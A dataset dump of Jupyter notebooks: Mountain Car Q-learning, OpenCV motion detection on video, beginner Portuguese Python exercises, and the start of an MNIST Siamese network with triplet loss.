hexsha
stringlengths 40
40
| size
int64 6
14.9M
| ext
stringclasses 1
value | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 6
260
| max_stars_repo_name
stringlengths 6
119
| max_stars_repo_head_hexsha
stringlengths 40
41
| max_stars_repo_licenses
list | max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 6
260
| max_issues_repo_name
stringlengths 6
119
| max_issues_repo_head_hexsha
stringlengths 40
41
| max_issues_repo_licenses
list | max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 6
260
| max_forks_repo_name
stringlengths 6
119
| max_forks_repo_head_hexsha
stringlengths 40
41
| max_forks_repo_licenses
list | max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | avg_line_length
float64 2
1.04M
| max_line_length
int64 2
11.2M
| alphanum_fraction
float64 0
1
| cells
list | cell_types
list | cell_type_groups
list |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cb4f67d611db917b50f923090d95e95109a145bf | 120,323 | ipynb | Jupyter Notebook | Mountain car with Q-learning.ipynb | jacobbath/reinforcement-learning | 314d2f6d050a12f7a1d73b73a99d01ef0e1ef75d | [
"MIT"
] | null | null | null | Mountain car with Q-learning.ipynb | jacobbath/reinforcement-learning | 314d2f6d050a12f7a1d73b73a99d01ef0e1ef75d | [
"MIT"
] | null | null | null | Mountain car with Q-learning.ipynb | jacobbath/reinforcement-learning | 314d2f6d050a12f7a1d73b73a99d01ef0e1ef75d | [
"MIT"
] | null | null | null | 148.363748 | 34,536 | 0.803579 | [
[
[
"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys",
"_____no_output_____"
],
[
"env = gym.make('MountainCar-v0')",
"_____no_output_____"
],
[
"LEARNING_RATE = 0.1\nNUM_EPISODES = 500\nDISCOUNT_FACTOR = 0.95",
"_____no_output_____"
],
[
"DISCRETE_OS_SIZE = [20] * len(env.observation_space.high)\ndiscrete_os_win_size = (env.observation_space.high-env.observation_space.low)/DISCRETE_OS_SIZE[0]",
"_____no_output_____"
],
[
"#q_table = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))\nq_table_1 = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))\nq_table_2 = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))",
"_____no_output_____"
],
[
"def get_discrete_state(state):\n discrete_state = (state-env.observation_space.low)/discrete_os_win_size\n return tuple(discrete_state.astype(np.int))",
"_____no_output_____"
],
[
"def make_epsilon_greedy_policy(epsilon, q_table_1, q_table_2):\n def policy_fn(state):\n q_table_avg = {}\n for i in range(20):\n for j in range(20):\n q_table_avg[(i,j)] = (q_table_1[(i,j)] + q_table_2[(i,j)])/2\n \n actions = q_table_avg[state]\n A = np.ones(len(actions), dtype=float) * (epsilon / len(actions))\n best_action = np.argmax(actions)\n A[best_action] += 1 - epsilon\n \n return A\n return policy_fn",
"_____no_output_____"
],
[
"policy = make_epsilon_greedy_policy(0.05, q_table_1, q_table_2)\nepisode_lengths = [0] * NUM_EPISODES\nepisode_rewards = [0] * NUM_EPISODES\n\nfor i_episode in range(NUM_EPISODES):\n state = env.reset()\n done = False \n if (i_episode+1) % 100 == 0:\n print('\\r', i_episode+1, end='')\n sys.stdout.flush()\n while not done: \n #if i_episode % 100 == 0:\n # env.render()\n discrete_state = get_discrete_state(state)\n action_probs = policy(discrete_state)\n action = np.random.choice(np.arange(len(action_probs)), p=action_probs)\n next_state, reward, done, _ = env.step(action)\n episode_lengths[i_episode] += 1\n episode_rewards[i_episode] += reward\n if not done:\n discrete_next_state = get_discrete_state(next_state)\n if np.random.random() > 0.5:\n best_next_q_value = q_table_2[discrete_next_state][np.argmax(q_table_1[discrete_next_state])]\n target = reward + DISCOUNT_FACTOR * best_next_q_value\n q_table_1[discrete_state][action] += LEARNING_RATE * (target - q_table_1[discrete_state][action])\n else:\n best_next_q_value = q_table_1[discrete_next_state][np.argmax(q_table_2[discrete_next_state])]\n target = reward + DISCOUNT_FACTOR * best_next_q_value\n q_table_2[discrete_state][action] += LEARNING_RATE * (target - q_table_2[discrete_state][action])\n \n elif next_state[0] >= env.goal_position:\n q_table_1[discrete_state][action] = 0\n q_table_2[discrete_state][action] = 0\n \n state = next_state ",
" 500"
],
[
"# Use this with the trainining function from DQN-file\nclass QAgent:\n def __init__(self, env):\n self.epsilon = 0.5\n self.epsilon_max = 0.5\n self.epsilon_min = 0.1\n self.epsilon_decay = (self.epsilon_max - self.epsilon_min) / 1000\n self.discount_factor = 0.95\n self.learning_rate = 0.1\n self.state_size = len(env.observation_space.high)\n self.action_size = env.action_space.n\n self.discrete_table_size = 20\n self.q_table = self.build_model()\n \n def build_model(self):\n table_size = [self.discrete_table_size] * self.state_size\n q_table = np.random.uniform(low=-2, high=0, size=(table_size+[self.action_size]))\n return q_table\n \n def get_discrete_state(self, state):\n normalized_state = (state - env.observation_space.low) / (env.observation_space.high - env.observation_space.low)\n rescaled_state = normalized_state * self.discrete_table_size\n return tuple(rescaled_state.astype(np.int))\n \n def act(self, state):\n if self.epsilon_max >= self.epsilon >= self.epsilon_min:\n self.epsilon -= self.epsilon_decay\n discrete_state = self.get_discrete_state(state)\n if np.random.random() > self.epsilon:\n q_values = self.q_table[discrete_state]\n return np.argmax(q_values)\n else:\n return np.random.choice(np.arange(self.action_size))\n \n def update(self, state, action, reward, next_state, done):\n discrete_state = self.get_discrete_state(state)\n if next_state[0] >= env.goal_position:\n self.q_table[discrete_state][action] = 0\n else:\n discrete_next_state = self.get_discrete_state(next_state)\n best_next_q_value = np.max(self.q_table[discrete_next_state])\n target = reward + self.discount_factor * best_next_q_value\n self.q_table[discrete_state][action] += self.learning_rate * (target - self.q_table[discrete_state][action])",
"_____no_output_____"
],
[
"x_double = np.convolve(episode_rewards, np.ones((20,))/20, mode='valid')\nfig = plt.plot(x_double)\nplt.show()",
"_____no_output_____"
],
[
"x = np.convolve(episode_rewards, np.ones((20,))/20, mode='valid')",
"_____no_output_____"
],
[
"fig = plt.plot(x)\nplt.show()",
"_____no_output_____"
],
[
"fig = plt.figure()\nax = plt.axes(projection='3d')\nx = np.arange(20)\ny = np.arange(20)\nX, Y = np.meshgrid(x, y)\nax.plot_wireframe(X, Y, q_table, color='green')\nplt.show()\n",
"_____no_output_____"
],
[
"q_table_avg = {}\nfor i in range(20):\n for j in range(20):\n q_table_avg[(i,j)] = (q_table_1[(i,j)] + q_table_2[(i,j)])/2\n",
"_____no_output_____"
],
[
"q_table_avg",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb4f72e237140a5a68eb7f7477804d1f11485966 | 5,529 | ipynb | Jupyter Notebook | 4_Pedestrian_Detection.ipynb | gabaugusto/python-with-opencv | 0d11533adfd0a8749b1fb71f4e5a39e6ce5a1699 | [
"MIT"
] | 1 | 2022-03-08T11:11:12.000Z | 2022-03-08T11:11:12.000Z | 4_Pedestrian_Detection.ipynb | gabaugusto/python-with-opencv | 0d11533adfd0a8749b1fb71f4e5a39e6ce5a1699 | [
"MIT"
] | null | null | null | 4_Pedestrian_Detection.ipynb | gabaugusto/python-with-opencv | 0d11533adfd0a8749b1fb71f4e5a39e6ce5a1699 | [
"MIT"
] | null | null | null | 23.0375 | 123 | 0.420872 | [
[
[
"# Python Blink Counter \n\n__En__: \n\n__PT__: ",
"_____no_output_____"
]
],
[
[
"import cv2\nimport numpy as np",
"_____no_output_____"
],
[
"cap = cv2.VideoCapture('videos/people.mp4')\nframe_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nframe_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))",
"_____no_output_____"
],
[
"fourcc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')",
"_____no_output_____"
],
[
"out = cv2.VideoWriter('videos/output.avi', fourcc, 5.0, (1280, 720))",
"_____no_output_____"
],
[
"ret, frame1 = cap.read()\nret, frame2 = cap.read()\n\nprint(frame1)\nprint(frame2)",
"[[[126 126 126]\n [128 128 128]\n [128 128 128]\n ...\n [147 150 148]\n [148 151 149]\n [148 151 149]]\n\n [[126 126 126]\n [128 128 128]\n [128 128 128]\n ...\n [147 150 148]\n [148 151 149]\n [148 151 149]]\n\n [[126 126 126]\n [126 126 126]\n [128 128 128]\n ...\n [147 150 148]\n [147 150 148]\n [148 151 149]]\n\n ...\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [229 229 229]\n [229 229 229]\n [229 229 229]]\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [229 229 229]\n [229 229 229]\n [229 229 229]]\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [229 229 229]\n [229 229 229]\n [229 229 229]]]\n[[[126 126 126]\n [128 128 128]\n [128 128 128]\n ...\n [147 150 148]\n [148 151 149]\n [148 151 149]]\n\n [[126 126 126]\n [128 128 128]\n [128 128 128]\n ...\n [147 150 148]\n [148 151 149]\n [148 151 149]]\n\n [[126 126 126]\n [126 126 126]\n [128 128 128]\n ...\n [147 150 148]\n [147 150 148]\n [148 151 149]]\n\n ...\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [230 230 230]\n [230 230 230]\n [230 230 230]]\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [230 230 230]\n [230 230 230]\n [230 230 230]]\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [230 230 230]\n [230 230 230]\n [230 230 230]]]\n"
],
[
"while cap.isOpened():\n diff = cv2.absdiff(frame1, frame2)\n gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (5,5), 0)\n _, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)\n \n dilated = cv2.dilate(thresh, None, iterations=3)\n contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n \n for contour in contours:\n (x, y, w, h) = cv2.boundingRect(contour)\n \n if cv2.contourArea(contour) < 900:\n continue\n \n cv2.rectangle(frame1, (x, y), (x+w, y+h), (0, 255, 0), 2)\n cv2.putText(frame1, \"Status: {}\".format('Movement'), (10 , 20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 3)\n \n image = cv2.resize(frame1, (1280,720))\n out.write(image)\n cv2.imshow(\"feed\", frame1)\n frame1 = frame2\n ret, frame2 = cap.read()\n \n if cv2.waitKey(40) == 27:\n break\n ",
"_____no_output_____"
],
[
"cv2.destroyAllWindows()\ncap.release()\nout.release()",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb4f8e1a3abde580aed4db2d82488b5dd596b990 | 13,994 | ipynb | Jupyter Notebook | Exercicio01.ipynb | janainaemilia/LingProg | d74ecd739e93f564f03c98cccbad72aa60032dbe | [
"MIT"
] | null | null | null | Exercicio01.ipynb | janainaemilia/LingProg | d74ecd739e93f564f03c98cccbad72aa60032dbe | [
"MIT"
] | null | null | null | Exercicio01.ipynb | janainaemilia/LingProg | d74ecd739e93f564f03c98cccbad72aa60032dbe | [
"MIT"
] | null | null | null | 28.443089 | 511 | 0.555381 | [
[
[
"## Exercício 01\n### Linguagens e Paradigmas de Programação\n\nJanaina Emilia\n<br /> <b>RA</b> 816114781",
"_____no_output_____"
],
[
"1- Faça um Programa que peça o raio de um círculo, calcule e\nmostre sua área.",
"_____no_output_____"
]
],
[
[
"import math\n\nraio = float(input(\"Digite o valor do raio:\"))\narea = math.pi * (raio ** 2)\n\nprint(\"A área do circulo é: \", area)",
"Digite o valor do raio:5.5\nA área do circulo é: 95.03317777109125\n"
]
],
[
[
"2- Faça um Programa que calcule a área de um quadrado, em\nseguida mostre o dobro desta área para o usuário.",
"_____no_output_____"
]
],
[
[
"base = float(input(\"Digite o valor da base:\"))\naltura = float(input(\"Digite o valor da altura:\"))\narea = (base * altura)\n\nprint(\"O dobro da área do quadrado é: \", area*2)",
"Digite o valor da base:5\nDigite o valor da altura:8\nO dobro da área do quadrado é: 80.0\n"
]
],
[
[
"3- Faça um Programa que pergunte quanto você ganha por hora e o\nnúmero de horas trabalhadas no mês. Calcule e mostre o total do\nseu salário no referido mês.",
"_____no_output_____"
]
],
[
[
"valor_hora = float(input(\"Quanto você ganha por hora?\"))\nhoras_mes = float(input(\"Quantas horas você trabalha por mês?\"))\n\nsalario = valor_hora * horas_mes\n\nprint(\"Seu salário mensal é: \", salario)",
"Quanto você ganha por hora?5\nQuantas horas você trabalha por mês?100\nSeu salário mensal é: 500.0\n"
]
],
[
[
"4- Faça um Programa que peça a temperatura em graus Farenheit,\ntransforme e mostre a temperatura em graus Celsius. C = (5 * (F-\n328 / 98.",
"_____no_output_____"
]
],
[
[
"temperatura_f = float(input(\"Digite uma temperatura em Farenheit:\"))\ntemperatura_c = (5 * (temperatura_f - 32)) / 9\n\nprint(\"A temperatura em Celcius é: \", temperatura_c)",
"Digite uma temperatura em Farenheit:15\nA temperatura em Celcius é: -9.444444444444445\n"
]
],
[
[
"5- Faça um Programa que peça a temperatura em graus Celsius,\ntransforme e mostre em graus Farenheit.",
"_____no_output_____"
]
],
[
[
"temperatura_c = float(input(\"Digite uma temperatura em Celsius:\"))\ntemperatura_f = ((temperatura_c / 5) * 9) + 32\n\nprint(\"A temperatura em Farenheit é: \", temperatura_f)",
"Digite uma temperatura em Celsius:40\nA temperatura em Farenheit é: 104.0\n"
]
],
[
[
"6- Faça um Programa que peça 2 números inteiros e um número\nreal. Calcule e mostre:\n- o produto do dobro do primeiro com metade do segundo .\n- a soma do triplo do primeiro com o terceiro.\n- o terceiro elevado ao cubo.",
"_____no_output_____"
]
],
[
[
"a = int(input(\"Digite o valor de A:\"))\nb = int(input(\"Digite o valor de B:\"))\nc = float(input(\"Digite o valor de C:\"))\n\nprint(\"O produto do dobro do primeiro com metade do segundo:\", (a * 2) * (b / 2))\nprint(\"A soma do triplo do primeiro com o terceiro\", (a * 3) + c)\nprint(\"O terceiro elevado ao cubo\", c ** 3)",
"Digite o valor de A:2\nDigite o valor de B:3\nDigite o valor de C:4\nO produto do dobro do primeiro com metade do segundo: 6.0\nA soma do triplo do primeiro com o terceiro 10.0\nO terceiro elevado ao cubo 64.0\n"
]
],
[
[
"7- João Papo-de-Pescador, homem de bem, comprou um microcomputador para controlar o rendimento diário de seu trabalho. Toda vez que ele traz um peso de peixes maior que o estabelecido pelo regulamento de pesca do estado de São Paulo (50 quilos) deve pagar uma multa de R$ 4,00 por quilo excedente. João precisa que você faça um programa que leia a variável peso (peso de peixes) e verifque se há excesso. Se houver, gravar na variável excesso e na variável multa o valor da multa que João deverá pagar.\nCaso contrário mostrar tais variáveis com o conteúdo ZERO.",
"_____no_output_____"
]
],
[
[
"peso = float(input(\"Informe o peso:\"))\nexcesso = 0\nmulta = 0\n\nif(peso > 50):\n excesso = peso - 50\n gramas = excesso - int(excesso)\n multa = excesso * 4\n\nprint(\"Peso excedido: \", excesso)\nprint(\"Valor da multa: \", multa)",
"Informe o peso:55.5\nPeso excedido: 5.5\nValor da multa: 22.0\n"
]
],
[
[
"8- Faça um Programa que pergunte quanto você ganha por hora e o\nnúmero de horas trabalhadas no mês. Calcule e mostre o total do\nseu salário no referido mês, sabendo-se que são descontados 11%\npara o Imposto de Renda, 8% para o INSS e 5% para o sindicato,\nfaça um programa que nos dê:\n- salário bruto.\n- quanto pagou ao INSS.\n- quanto pagou ao sindicato.\n- o salário líquido.\n- calcule os descontos e o salário líquido, conforme a tabela abaixo\n+Salário Bruto:R$\n-IR (11%):R$\n-INSS (8%):R$\n-Sindicato (5):R$\n=Salário Liquido:R$\nObs.: Salário Bruto - Descontos = Salário Líquido.",
"_____no_output_____"
]
],
[
[
"valor_hora = float(input(\"Quanto você ganha por hora?\"))\nhoras_mes = float(input(\"Quantas horas você trabalha por mês?\"))\n\nsalario_bruto = valor_hora * horas_mes\nimposto_de_renda = salario_bruto * 0.11\ninss = salario_bruto * 0.08\nsindicato = salario_bruto * 0.05\n\nsalario_liquido = salario_bruto - (imposto_de_renda + inss + sindicato)\n\nprint(\"Seu salário bruto mensal é: \", salario_bruto)\nprint(\"Valor do Imposto de Renda: \", imposto_de_renda)\nprint(\"Valor do INSS: \", inss)\nprint(\"Valor do Sindicato: \", sindicato)\nprint(\"Seu salário liquido mensal é: \", salario_liquido)\n",
"Quanto você ganha por hora?40\nQuantas horas você trabalha por mês?100\nSeu salário bruto mensal é: 4000.0\nValor do Imposto de Renda: 440.0\nValor do INSS: 320.0\nValor do Sindicato: 200.0\nSeu salário liquido mensal é: 3040.0\n"
]
],
[
[
"9- Faça um programa que leia 2 strings e informe o conteúdo delas\nseguido do seu comprimento. Informe também se as duas strings\npossuem o mesmo comprimento e são iguais ou diferentes no\nconteúdo.\nExemplo:\nString 1: Brasil Hexa 2018\nString 2: Brasil! Hexa 2018!\nTamanho de \"Brasil Hexa 2018\": 16 caracteres\nTamanho de \"Brasil! Hexa 2018!\": 18 caracteres\nAs duas strings são de tamanhos diferentes.\nAs duas strings possuem conteúdo diferente.",
"_____no_output_____"
]
],
[
[
"string_a = input(\"Digite a primeira frase: \")\nstring_b = input(\"Digite a segunda frase: \")\n\nprint(\"String 1: \", string_a)\nprint(\"String 2: \", string_b)\n\nprint(\"Tamanho de \" + string_a + \": \", len(string_a))\nprint(\"Tamanho de \" + string_b + \": \", len(string_b))\n\nif(len(string_a) == len(string_b)):\n print(\"As duas strings tem o mesmo tamanho.\")\nelse:\n print(\"As duas strings tem tamanho diferente.\")\n\nif(string_a == string_b):\n print(\"As duas strings possuem o mesmo conteúdo.\")\nelse:\n print(\"As duas strings possuem conteúdo diferente.\")",
"Digite a primeira frase: Ola mundo\nDigite a segunda frase: Olá Mundo!\nString 1: Ola mundo\nString 2: Olá Mundo!\nTamanho de Ola mundo: 9\nTamanho de Olá Mundo!: 10\nAs duas strings tem tamanho diferente.\nAs duas strings possuem conteúdo diferente.\n"
]
],
[
[
"10- Faça um programa que permita ao usuário digitar o seu nome e\nem seguida mostre o nome do usuário de trás para frente utilizando\nsomente letras maiúsculas. Dica: lembre−se que ao informar o\nnome o usuário pode digitar letras maiúsculas ou minúsculas.\nObservação: não use loops.",
"_____no_output_____"
]
],
[
[
"username = input(\"Digite seu nome:\")\nprint(username[::-1].upper())",
"Digite seu nome:Janaina\nANIANAJ\n"
]
],
[
[
"11- Faça um programa que solicite a data de nascimento\n(dd/mm/aaaa) do usuário e imprima a data com o nome do mês por\nextenso.\nData de Nascimento: 29/10/1973\nVocê nasceu em 29 de Outubro de 1973.\nObs.: Não use desvio condicional nem loops.",
"_____no_output_____"
]
],
[
[
"import locale\nfrom datetime import date\nlocale.setlocale(locale.LC_TIME, 'portuguese_brazil')\n\ndata_nascimento = input(\"Informe a data de nascimento: (dd/mm/aa)\").split(\"/\")\ndata = date(day=int(data_nascimento[0]), month=int(data_nascimento[1]), year=int(data_nascimento[2]))\n\nstr = data.strftime('%A %d de %B de %Y')\n\nprint(\"Você nasceu em\", str)",
"Informe a data de nascimento: (dd/mm/aa)03/06/1997\nVocê nasceu em terça-feira 03 de junho de 1997\n"
]
],
[
[
"12- Leet é uma forma de se escrever o alfabeto latino usando outros\nsímbolos em lugar das letras, como números por exemplo. A própria\npalavra leet admite muitas variações, como l33t ou 1337. O uso do\nleet reflete uma subcultura relacionada ao mundo dos jogos de\ncomputador e internet, sendo muito usada para confundir os\niniciantes e afrmar-se como parte de um grupo. Pesquise sobre as\nprincipais formas de traduzir as letras. Depois, faça um programa\nque peça uma texto e transforme-o para a grafa leet speak.\nDesafo: não use loops nem desvios condicionais.",
"_____no_output_____"
]
],
[
[
"string = input(\"Digite um texto qualquer: \")\n \ntranslation = {\"a\": \"4\", \"A\": \"4\", \"e\": \"3\", \"E\": \"3\", \"i\": \"1\", \"I\": \"1\", \"o\": \"0\", \"O\": \"0\", \"t\": \"7\", \"T\": \"7\", \"s\": '5', \"S\": '5'}\n\nstring = string.translate(str.maketrans(translation))\n\nprint(string)",
"Digite um texto qualquer: Leet is pretty\nL337 15 pr377y\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb4f9a4b16b8b837510d41076341c522e40efe0d | 395,554 | ipynb | Jupyter Notebook | Siamese-Neural-Network-MNIST.ipynb | Trotts/Siamese-Neural-Network-MNIST-Triplet-Loss | 13d0524339539cb2b6b4382875dd1b8caae77c26 | [
"MIT"
] | 12 | 2021-02-20T08:43:01.000Z | 2022-03-31T11:20:23.000Z | Siamese-Neural-Network-MNIST.ipynb | Trotts/Siamese-Neural-Network-MNIST-Triplet-Loss | 13d0524339539cb2b6b4382875dd1b8caae77c26 | [
"MIT"
] | 2 | 2021-05-21T06:12:56.000Z | 2022-02-04T08:55:17.000Z | Siamese-Neural-Network-MNIST.ipynb | Trotts/Siamese-Neural-Network-MNIST-Triplet-Loss | 13d0524339539cb2b6b4382875dd1b8caae77c26 | [
"MIT"
] | 2 | 2022-02-17T21:35:36.000Z | 2022-03-12T07:22:09.000Z | 219.264967 | 90,036 | 0.874664 | [
[
[
"# Siamese Neural Network with Triplet Loss trained on MNIST\n## Cameron Trotter\n### [email protected]\n\nThis notebook builds an SNN to determine similarity scores between MNIST digits using a triplet loss function. The use of class prototypes at inference time is also explored. \n\nThis notebook is based heavily on the approach described in [this Coursera course](https://www.coursera.org/learn/siamese-network-triplet-loss-keras/), which in turn is based on the [FaceNet](https://arxiv.org/abs/1503.03832) paper. Any uses of open-source code are linked throughout where utilised. \n\nFor an in-depth guide to understand this code, and the theory behind it, please see LINK.\n",
"_____no_output_____"
],
[
"### Imports",
"_____no_output_____"
]
],
[
[
"# TF 1.14 gives lots of warnings for deprecations ready for the switch to TF 2.0\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport os\nimport glob\n\nfrom datetime import datetime\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.callbacks import Callback, CSVLogger, ModelCheckpoint\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.layers import Activation, Input, concatenate\nfrom tensorflow.keras.layers import Layer, BatchNormalization, MaxPooling2D, Concatenate, Lambda, Flatten, Dense\nfrom tensorflow.keras.initializers import glorot_uniform, he_uniform\nfrom tensorflow.keras.regularizers import l2\nfrom tensorflow.keras.utils import multi_gpu_model\n\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import roc_curve, roc_auc_score\nimport math\nfrom pylab import dist\nimport json\n\nfrom tensorflow.python.client import device_lib\nimport matplotlib.gridspec as gridspec",
"_____no_output_____"
]
],
[
[
"## Import the data and reshape for use with the SNN\n\nThe data loaded in must be in the same format as `tf.keras.datasets.mnist.load_data()`, that is `(x_train, y_train), (x_test, y_test)`",
"_____no_output_____"
]
],
[
[
"(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\nnum_classes = len(np.unique(y_train))\n\nx_train_w = x_train.shape[1] # (60000, 28, 28)\nx_train_h = x_train.shape[2]\nx_test_w = x_test.shape[1]\nx_test_h = x_test.shape[2]\n\nx_train_w_h = x_train_w * x_train_h # 28 * 28 = 784\nx_test_w_h = x_test_w * x_test_h\n\nx_train = np.reshape(x_train, (x_train.shape[0], x_train_w_h))/255. # (60000, 784)\nx_test = np.reshape(x_test, (x_test.shape[0], x_test_w_h))/255.",
"_____no_output_____"
]
],
[
[
"### Plotting the triplets",
"_____no_output_____"
]
],
[
[
"def plot_triplets(examples):\n plt.figure(figsize=(6, 2))\n for i in range(3):\n plt.subplot(1, 3, 1 + i)\n plt.imshow(np.reshape(examples[i], (x_train_w, x_train_h)), cmap='binary')\n plt.xticks([])\n plt.yticks([])\n plt.show()\n \nplot_triplets([x_train[0], x_train[1], x_train[2]])",
"_____no_output_____"
]
],
[
[
"### Create triplet batches\n\nRandom batches are generated by `create_batch`. Semi-hard triplet batches are generated by `create_batch_hard`.\n\nSemi-Hard: dist(A, P) < dist(A, N) < dist(A, P) + margin. Using only easy triplets will lead to no learning. Hard triplets generate high loss and have high impact on training parameters, but may cause any mislabelled data to cause too much of a weight change. ",
"_____no_output_____"
]
],
[
[
"def create_batch(batch_size=256, split = \"train\"):\n x_anchors = np.zeros((batch_size, x_train_w_h))\n x_positives = np.zeros((batch_size, x_train_w_h))\n x_negatives = np.zeros((batch_size, x_train_w_h))\n \n if split ==\"train\":\n data = x_train\n data_y = y_train\n else:\n data = x_test\n data_y = y_test\n \n for i in range(0, batch_size):\n # We need to find an anchor, a positive example and a negative example\n random_index = random.randint(0, data.shape[0] - 1)\n x_anchor = data[random_index]\n y = data_y[random_index]\n \n indices_for_pos = np.squeeze(np.where(data_y == y))\n indices_for_neg = np.squeeze(np.where(data_y != y))\n \n x_positive = data[indices_for_pos[random.randint(0, len(indices_for_pos) - 1)]]\n x_negative = data[indices_for_neg[random.randint(0, len(indices_for_neg) - 1)]]\n \n x_anchors[i] = x_anchor\n x_positives[i] = x_positive\n x_negatives[i] = x_negative\n \n return [x_anchors, x_positives, x_negatives]\n\n\ndef create_hard_batch(batch_size, num_hard, split = \"train\"):\n \n x_anchors = np.zeros((batch_size, x_train_w_h))\n x_positives = np.zeros((batch_size, x_train_w_h))\n x_negatives = np.zeros((batch_size, x_train_w_h))\n \n if split ==\"train\":\n data = x_train\n data_y = y_train\n else:\n data = x_test\n data_y = y_test\n \n # Generate num_hard number of hard examples:\n hard_batches = [] \n batch_losses = []\n \n rand_batches = []\n \n # Get some random batches\n for i in range(0, batch_size):\n hard_batches.append(create_batch(1, split))\n \n A_emb = embedding_model.predict(hard_batches[i][0])\n P_emb = embedding_model.predict(hard_batches[i][1])\n N_emb = embedding_model.predict(hard_batches[i][2])\n \n # Compute d(A, P) - d(A, N) for each selected batch\n batch_losses.append(np.sum(np.square(A_emb-P_emb),axis=1) - np.sum(np.square(A_emb-N_emb),axis=1))\n \n # Sort batch_loss by distance, highest first, and keep num_hard of them\n hard_batch_selections = [x for _, x in sorted(zip(batch_losses,hard_batches), key=lambda x: x[0])]\n hard_batches = hard_batch_selections[:num_hard]\n \n # Get batch_size - num_hard number of random examples\n num_rand = batch_size - num_hard\n for i in range(0, num_rand):\n rand_batch = create_batch(1, split)\n rand_batches.append(rand_batch)\n \n selections = hard_batches + rand_batches\n \n for i in range(0, len(selections)):\n x_anchors[i] = selections[i][0]\n x_positives[i] = selections[i][1]\n x_negatives[i] = selections[i][2]\n \n return [x_anchors, x_positives, x_negatives]\n \n ",
"_____no_output_____"
]
],
[
[
"### Create the Embedding Model\n\nThis model takes in input image and generates some `emb_size`-dimensional embedding for the image, plotted on some latent space.\n\nThe untrained model's embedding space is stored for later use when comparing clustering between the untrained and the trained model using PCA, based on [this notebook](https://github.com/AdrianUng/keras-triplet-loss-mnist/blob/master/Triplet_loss_KERAS_semi_hard_from_TF.ipynb).",
"_____no_output_____"
]
],
[
[
"def create_embedding_model(emb_size):\n embedding_model = tf.keras.models.Sequential([\n Dense(4096,\n activation='relu',\n kernel_regularizer=l2(1e-3),\n kernel_initializer='he_uniform',\n input_shape=(x_train_w_h,)),\n Dense(emb_size,\n activation=None,\n kernel_regularizer=l2(1e-3),\n kernel_initializer='he_uniform')\n ])\n\n embedding_model.summary()\n \n return embedding_model",
"_____no_output_____"
]
],
[
[
"### Create the SNN\n\nThis model takes a triplet image input, passes them to the embedding model for embedding, then concats them together for the loss function",
"_____no_output_____"
]
],
[
[
"def create_SNN(embedding_model):\n\n input_anchor = tf.keras.layers.Input(shape=(x_train_w_h,))\n input_positive = tf.keras.layers.Input(shape=(x_train_w_h,))\n input_negative = tf.keras.layers.Input(shape=(x_train_w_h,))\n\n embedding_anchor = embedding_model(input_anchor)\n embedding_positive = embedding_model(input_positive)\n embedding_negative = embedding_model(input_negative)\n\n output = tf.keras.layers.concatenate([embedding_anchor, embedding_positive, \n embedding_negative], axis=1)\n\n siamese_net = tf.keras.models.Model([input_anchor, input_positive, input_negative], \n output)\n siamese_net.summary()\n \n return siamese_net",
"_____no_output_____"
]
],
[
[
"### Create the Triplet Loss Function",
"_____no_output_____"
]
],
[
[
